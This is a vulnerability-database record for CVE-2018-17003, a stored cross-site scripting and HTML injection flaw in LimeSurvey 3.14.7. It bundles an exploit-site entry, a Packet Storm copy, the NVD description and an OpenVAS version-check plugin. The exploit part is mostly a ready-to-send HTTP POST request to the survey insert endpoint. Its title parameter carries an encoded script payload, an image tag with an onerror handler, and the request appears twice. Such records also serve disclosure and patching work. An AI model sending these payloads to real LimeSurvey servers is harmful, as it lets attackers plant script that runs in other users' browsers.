{"id": "1337DAY-ID-31137", "type": "zdt", "bulletinFamily": "exploit", "title": "LimeSurvey 3.14.7 Cross Site Scripting Vulnerability", "description": "Exploit for php platform in category web applications", "published": "2018-09-20T00:00:00", "modified": "2018-09-20T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/31137", "reporter": "\u0130smail Ta\u015fdelen", "references": [], "cvelist": ["CVE-2018-17003"], "immutableFields": [], "lastseen": "2018-09-22T13:49:56", "viewCount": 6, "enchantments": {"score": {"value": 0.1, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-17003"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310113263"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:149435"]}], "rev": 4}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2018-17003"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310113263"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:149435"]}]}, "exploitation": null, "vulnersScore": 0.1}, "sourceHref": "https://0day.today/exploit/31137", "sourceData": "# Exploit Title: LimeSurvey 3.14.7 - HTML Injection and Stored XSS \r\n# Exploit Author: Ismail Tasdelen\r\n# Vendor Homepage: https://www.limesurvey.org/\r\n# Software Link : https://github.com/LimeSurvey/LimeSurvey\r\n# Software : LimeSurvey 3.14.7\r\n# Product Version: 3.14.7\r\n# Vulnerability Type : Command Injection\r\n# Vulnerability : HTML Injection and Stored XSS\r\n# CVE : CVE-2018-17003\r\n\r\nIn LimeSurvey 3.14.7, HTML Injection and Stored XSS have been discovered in the appendix via the surveyls_title parameter to /index.php?r=admin/survey/sa/insert.\r\n \r\n# HTTP Request Header :\r\n\r\nPOST /index.php?r=admin/survey/sa/insert HTTP/1.1\r\nHost: TARGET\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, 
deflate\r\nReferer: https://TARGET/index.php?r=admin/survey/sa/newsurvey\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nContent-Length: 1171\r\nCookie: PHPSESSID=6o9og816dj2mjcupb6fvj09ob5; YII_CSRF_TOKEN=UVlQck12amlvN2g5QXIzS3kzTkl2cVNublRaQUNLZjhTGCmk4Kn1zO5gNBDuyHPEnql1b-Rg77VveQ4beA0TCg%3D%3D\r\nConnection: close\r\n\r\nYII_CSRF_TOKEN=UVlQck12amlvN2g5QXIzS3kzTkl2cVNublRaQUNLZjhTGCmk4Kn1zO5gNBDuyHPEnql1b-Rg77VveQ4beA0TCg%3D%3D&surveyls_title=%22%3E%3Ch1%3EIsmail+Tasdelen%3C%2Fh1%3E%3Cimg+src%3Dx+onerror%3Dalert(%22ismailtasdelen%22)%3E&language=en&createsample=0&description=&url=&urldescrip=&dateformat=3&numberformat_en=0&welcome=&endtext=&owner_id=1&admin=Administrator&adminemail=test%40domain.test&bounce_email=test%40domain.test&faxto=&gsid=23&format=G&template=fruity&navigationdelay=0&questionindex=0&showgroupinfo=B&showqnumcode=B&shownoanswer=N&showxquestions=0&showwelcome=0&showwelcome=1&allowprev=0&nokeyboard=0&showprogress=0&showprogress=1&printanswers=0&publicstatistics=0&publicgraphs=0&autoredirect=0&startdate=&expires=&listpublic=0&usecookie=0&usecaptcha_surveyaccess=0&usecaptcha_registration=0&usecaptcha_saveandload=0&datestamp=0&ipaddr=0&refurl=0&savetimings=0&assessments=0&allowsave=0&allowsave=1&emailnotificationto=&emailresponseto=&googleanalyticsapikeysetting=N&googleanalyticsstyle=0&tokenlength=15&anonymized=0&tokenanswerspersistence=0&alloweditaftercompletion=0&allowregister=0&htmlemail=0&htmlemail=1&sendconfirmation=0&sendconfirmation=1&saveandclose=1\n\n# 0day.today [2018-09-22] #", "_state": {"dependencies": 1645430244, "score": 1659805755}, "_internal": {"score_hash": "4b232735100ae4541a834e9237fb0213"}}
{"packetstorm": [{"lastseen": "2018-09-20T02:05:55", "description": "", "published": "2018-09-19T00:00:00", "type": "packetstorm", "title": "LimeSurvey 3.14.7 Cross Site Scripting", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-17003"], "modified": "2018-09-19T00:00:00", "id": "PACKETSTORM:149435", "href": "https://packetstormsecurity.com/files/149435/LimeSurvey-3.14.7-Cross-Site-Scripting.html", "sourceData": "`# Exploit Title: LimeSurvey 3.14.7 - HTML Injection and Stored XSS \n# Date: 2018-09-12 \n# Exploit Author: Ismail Tasdelen \n# Vendor Homepage: https://www.limesurvey.org/ \n# Software Link : https://github.com/LimeSurvey/LimeSurvey \n# Software : LimeSurvey 3.14.7 \n# Product Version: 3.14.7 \n# Vulnerability Type : Command Injection \n# Vulnerability : HTML Injection and Stored XSS \n# CVE : CVE-2018-17003 \n \nIn LimeSurvey 3.14.7, HTML Injection and Stored XSS have been discovered in the appendix via the surveyls_title parameter to /index.php?r=admin/survey/sa/insert. \n \n# HTTP Request Header : \n \nPOST /index.php?r=admin/survey/sa/insert HTTP/1.1 \nHost: TARGET \nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 \nAccept: */* \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: https://TARGET/index.php?r=admin/survey/sa/newsurvey \nContent-Type: application/x-www-form-urlencoded; charset=UTF-8 \nX-Requested-With: XMLHttpRequest \nContent-Length: 1171 \nCookie: PHPSESSID=6o9og816dj2mjcupb6fvj09ob5; YII_CSRF_TOKEN=UVlQck12amlvN2g5QXIzS3kzTkl2cVNublRaQUNLZjhTGCmk4Kn1zO5gNBDuyHPEnql1b-Rg77VveQ4beA0TCg%3D%3D \nConnection: close \n 
\nYII_CSRF_TOKEN=UVlQck12amlvN2g5QXIzS3kzTkl2cVNublRaQUNLZjhTGCmk4Kn1zO5gNBDuyHPEnql1b-Rg77VveQ4beA0TCg%3D%3D&surveyls_title=%22%3E%3Ch1%3EIsmail+Tasdelen%3C%2Fh1%3E%3Cimg+src%3Dx+onerror%3Dalert(%22ismailtasdelen%22)%3E&language=en&createsample=0&description=&url=&urldescrip=&dateformat=3&numberformat_en=0&welcome=&endtext=&owner_id=1&admin=Administrator&adminemail=test%40domain.test&bounce_email=test%40domain.test&faxto=&gsid=23&format=G&template=fruity&navigationdelay=0&questionindex=0&showgroupinfo=B&showqnumcode=B&shownoanswer=N&showxquestions=0&showwelcome=0&showwelcome=1&allowprev=0&nokeyboard=0&showprogress=0&showprogress=1&printanswers=0&publicstatistics=0&publicgraphs=0&autoredirect=0&startdate=&expires=&listpublic=0&usecookie=0&usecaptcha_surveyaccess=0&usecaptcha_registration=0&usecaptcha_saveandload=0&datestamp=0&ipaddr=0&refurl=0&savetimings=0&assessments=0&allowsave=0&allowsave=1&emailnotificationto=&emailresponseto=&googleanalyticsapikeysetting=N&googleanalyticsstyle=0&tokenlength=15&anonymized=0&tokenanswerspersistence=0&alloweditaftercompletion=0&allowregister=0&htmlemail=0&htmlemail=1&sendconfirmation=0&sendconfirmation=1&saveandclose=1 \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/149435/limesurvey3147-xss.txt"}], "cve": [{"lastseen": "2022-03-23T14:24:27", "description": "In LimeSurvey 3.14.7, HTML Injection and Stored XSS have been discovered in the appendix via the surveyls_title parameter to /index.php?r=admin/survey/sa/insert.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2018-09-21T17:29:00", 
"type": "cve", "title": "CVE-2018-17003", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-17003"], "modified": "2018-11-09T17:53:00", "cpe": ["cpe:/a:limesurvey:limesurvey:3.14.7"], "id": "CVE-2018-17003", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-17003", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:limesurvey:limesurvey:3.14.7:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2019-10-09T14:49:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-16397", "CVE-2018-17003"], "description": "LimeSurvey is prone to multiple vulnerabilities.", "modified": "2019-10-07T00:00:00", "published": "2018-09-05T00:00:00", "id": "OPENVAS:1361412562310113263", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310113263", "type": "openvas", "title": "LimeSurvey <= 3.14.7 Multiple Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# LimeSurvey <= 3.14.7 Multiple Vulnerabilities\n#\n# Authors:\n# Jan Philipp Schulte <jan.schulte@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, https://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it 
will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif( description )\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.113263\");\n script_version(\"2019-10-07T14:34:48+0000\");\n script_tag(name:\"last_modification\", value:\"2019-10-07 14:34:48 +0000 (Mon, 07 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-09-05 11:15:05 +0200 (Wed, 05 Sep 2018)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_cve_id(\"CVE-2018-16397\", \"CVE-2018-17003\");\n\n script_name(\"LimeSurvey <= 3.14.7 Multiple Vulnerabilities\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_limesurvey_detect.nasl\");\n script_mandatory_keys(\"limesurvey/installed\");\n\n script_tag(name:\"summary\", value:\"LimeSurvey is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"insight\", value:\"The following vulnerabilities exist:\n\n - An admin user can leverage a file upload question to read an arbitrary file\n\n - An authenticated stored XSS vulnerability can be exploited via /index.php?r=admin/survey/sa/insert\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"LimeSurvey through version 3.14.7.\");\n\n 
script_tag(name:\"solution\", value:\"Update to version 3.14.8 or later.\");\n\n script_xref(name:\"URL\", value:\"https://github.com/LimeSurvey/LimeSurvey/blob/3be9b41e76826b57f5860d18d93b23f47d59d2e4/docs/release_notes.txt#L51\");\n script_xref(name:\"URL\", value:\"https://packetstormsecurity.com/files/149435/LimeSurvey-3.14.7-Cross-Site-Scripting.html\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:limesurvey:limesurvey\";\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nif( ! port = get_app_port( cpe: CPE ) ) exit( 0 );\nif( ! version = get_app_version( cpe: CPE, port: port ) ) exit( 0 );\n\nif( version_is_less( version: version, test_version: \"3.14.8\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.14.8\" );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}]}